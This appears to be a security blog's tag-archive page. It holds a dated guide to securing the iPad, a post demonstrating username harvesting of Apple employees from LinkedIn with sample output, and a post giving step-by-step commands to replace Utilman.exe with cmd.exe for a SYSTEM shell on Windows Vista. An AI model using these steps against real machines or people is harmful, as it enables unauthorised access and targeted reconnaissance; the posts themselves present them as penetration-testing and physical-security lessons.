Tag Archives: hacking

How to make iPad Secure?

The iPad has been a very popular new device sold by Apple. But the iPad isn’t really enterprise ready, in terms of manageability and security. IT organizations are buckling under pressure to support the iPad, even though the iPad wouldn’t have passed last year’s enterprise security requirements. If you use this device you may be concerned about the iPad security. Here is some information you might be interested in.

Although Apple has an enviable reputation for producing secure computers, there has been many concerns expressed with the security and safety in devices like the iPad. This device uses a standard called iOS 4.

A recent report indicated that a Russian software was developed which can enable people to gain access to password protected iOS data backups.

Even more disturbing is the fact the iOS keeps virtually a complete log of everything a user types of the keyboard. This includes credit card information, account numbers, etc.

In addition these types of mobile devices require frequent updates which increase the risk of security breaches even more so.

It was reported by a French research firm called VUPEN Security that there are two major flaws which leaves iOS vulnerable. One is a memory corruption error which occurs when is processes a pdf file. And the other is an iOS kernel error.

This means that an app could get low level access to the operating system. Apple has tried to prevent this through the use of private API’s. However this has had questionable benefit.

How to Secure IPad?

AT&T has confirmed that the e-mail addresses of over 100,000 iPad 3G owners using its 3G network have been exposed. According to the carrier, it first learned of the issue on June 7 and resolved it on June 8.

Admittedly, AT&T’s security breach isn’t all that groundbreaking. If only e-mail addresses were stolen, it’s not the end of the world, since that wouldn’t be enough to use to steal more private information.

But that doesn’t mean it’s the end of the story. The iPad is just like any other computer, complete with the potential to access sensitive information. Realizing that, it’s incumbent upon iPad owners to engage in practices and use software that will make it easier for them to keep their private data secure.

Unfortunately, no product is safe from the crosshairs of malicious hackers. Try as consumers might to use products that will keep them secure, all it takes is one mistake or a network flaw beyond their control to wreak havoc on their personal lives. Let’s take a look at some things that iPad owners can do to keep their data private and secure.

1. Keep syncing

It might sound rather simplistic, but users should keep syncing their iPads with their computers as often as possible. The reason why is twofold. For one, the desktop computer acts as a removable storage device for the data on the tablet. Secondly, Windows machines or Mac OS X computers have better security controls than the iPad. If data is extremely important and consumers want to keep it away from prying eyes, having it in a more secure environment is always preferable.

2. Use security apps

The iPad runs iPhone OS. In other words, all the security tools that are available in Apple’s App Store that are designed for the iPhone will also work with Apple’s tablet. In some cases, the security tools aren’t all that useful, so exercising some vigilance before downloading certain applications is a good idea. But there are other apps that monitor network connections, keep passwords safe and much more. Although it’s easy to only browse iPad apps, some iPhone security apps will come in quite handy.

3. Work on trusted WiFi networks

Any iPad owner should be positive that the WiFi network he or she is on is trusted and safe. In far too many cases, WiFi connections on unprotected networks just aren’t as safe as they should be. And although it’s more difficult for folks to access information on an iPad than on, say, a Windows PC, sending sensitive information over that network can be dangerous, to say the least. Once again, the iPad is little more than a newly designed computer. Owners must always keep that in mind.

4. Stay off 3G wherever possible

Although AT&T’s 3G network has enjoyed relative security thus far, iPad owners should keep their tablets off the network as much as possible. When connecting over 3G, users are at the mercy of the network. They don’t necessarily know that it’s secure at all times, and they need to rely on the quality of AT&T’s service. But when surfing the Web on a WPA (Wi-Fi Protected Access)-protected router in their homes or organization, they have more control over security settings and what can be done to keep data secure. Little changes like that can go a long way in keeping iPad data safe and secure.

5. Remember Windows rules apply

iPads may not be running Windows, but some of the lessons learned in the PC ecosystem still apply in the iPad world. For instance, surfing to unknown, untrusted sites is never a good idea. Users should also refrain from opening attachments sent by people they don’t know. Unfortunately, these simple rules just aren’t followed by many iPad owners because they believe they’re safe. As AT&T’s network snafu has shown, there is no one who is absolutely safe from danger. Maintaining vigilance when using the iPad is the most important component of keeping it secure.

6. Physical security matters too

Physical security doesn’t always get the kind of play that network security does, but it’s arguably more important. If users really want to keep their sensitive information private, they need to be more careful with the iPad. They shouldn’t leave it on the table at a Starbucks when they pick up their drink at the counter. They also shouldn’t leave it lying around in plain view in the office for anyone to pick up. Those who want to steal sensitive information would rather have the device in hand than connect to it from other parts of the world.

7. Trust is a dangerous thing

Trust can wreak havoc on a person’s life when it comes to computer security. There’s little debating that there are few, if any, Websites that should be absolutely trusted. Not even e-mails from friends can be trusted, especially if they include unexpected attachments. In too many cases, Web users believe that simply because they have been to a site each and every day for the past three years, they will remain safe on that site. That’s a faulty belief. With some simple phishing scams or spoofing, all kinds of trouble can erupt. Don’t trust anything—even when using the iPad.

8. Passwords mean everything

Passwords are extremely important. With strong passwords, users can have a little more peace of mind if an iPad is stolen and is in the hands of a malicious hacker. Too often, folks use the same passwords for all their different online identities. The password someone uses to log in to Gmail is the same password he uses for online banking. The password he inputs to tweet with friends is the same as the code he uses when he needs to pay down his credit card balance. That’s not a good thing. As soon as attackers have one password, they will try it everywhere else. At the same time, the difficulty of breaking a password must always be kept in mind. iPad owners can’t use “1234″ for a password. They should be using alphanumeric passwords that have capital letters and symbols. It might sound like a pain to type in such passwords every time, but owners will be happy they did so if the iPad is stolen.

9. Lock it down

The iPad comes with password protection. And anyone who wants to keep data safe should lock it down with a strong password. In the iPad’s settings menu, owners can opt to turn on the device’s passcode lock. Once this has been done, every time the screen is turned on, users will be required to input a password to access the iPad’s home page. Again, it’s a pain for those who don’t want to have to input a passcode each time. But when it comes to security and the safety of private data, it’s arguably one of the best things a user can do.

References:

http://discussions.apple.com/thread.jspa?threadID=2632583

http://www.eweek.com/c/a/Security/10-Ways-to-Keep-Data-Private-Secure-on-the-iPad-369345/1/

http://www.bnet.com/blog/technology-business/apple-iphone-ipad-security-goes-into-the-toilet-and-down-the-tubes/4653

http://www.securityextra.com/ipad-security-important-to-consider.html

http://www.ditii.com/2010/10/14/ipad-security-bug-helps-you-download-publications-for-free/

Username harvesting from Social Media

I mentioned some command line utilities you can use to extract user names on internet on my previous blog post.

Today I want to discuss one of these tools: Reconioter

Nowadays, everybody wants to be connected. People want to increase their social networking with facebook, myspace, Linkedin, etc.

Reconioter searches Linkedin’s company directories and find possible user names. Its simple syntax as following:

./usernameGen.py query #number of pages

I have installed it on my BackTrack4 and do some testing. For example, we want to learn some user names for Apple employees, then we can run

./usernameGen.py Apple 2
anefkens
arnoldn
nefkensa
dnewell
dustinn
newelld
abologan
anatolb
bologana
pfrancois
paulf
francoisp
bbondy
brennb
bondyb
zbezdan
zsoltb
bezdanz
tinofaith
tobiasi
inofaitht
erami
eduardor
ramie

As you may realize after finding employees names, the program outputs them in some common user name formats: First name last initial, last name first initial, and first initial, last name.

This tool is great for penetration testers who want to demonstrate some intelligence gathering techniques usage.

Owning Windows Vista with Linux

In this blog post I want to show you a security problem related to Windows Vista.

Vista is criticized for mostly because it uses too much resources.  However do you know that you can “own” the Vista by using Linux.

That is right, you can get access to Vista without any password cracking or anything.

First, boot your machine with Linux.

Go to Windows partition:

cd /mnt/sda1 -a

Now, go to System32 directory:

cd Windows/System32

Backup Utilman.exe file:

mv Utilman.exe Utilman_backup.exe

Copy cmd.exe as Utilman.exe

cp cmd.exe Utilman.exe

Now reboot the machine and remove Linux live CD from CD room.

WindowsVistaHacking

Press CTRL+U to invoke utility manager.

Now, command prompt should be appeared since we have cmd.exe instead of original Utilman.exe

Type whoami to see who you are: System!!!

Type explorer and you can do whatever you want!

capture22

This simple example shows how physical security is important in your company or even at home.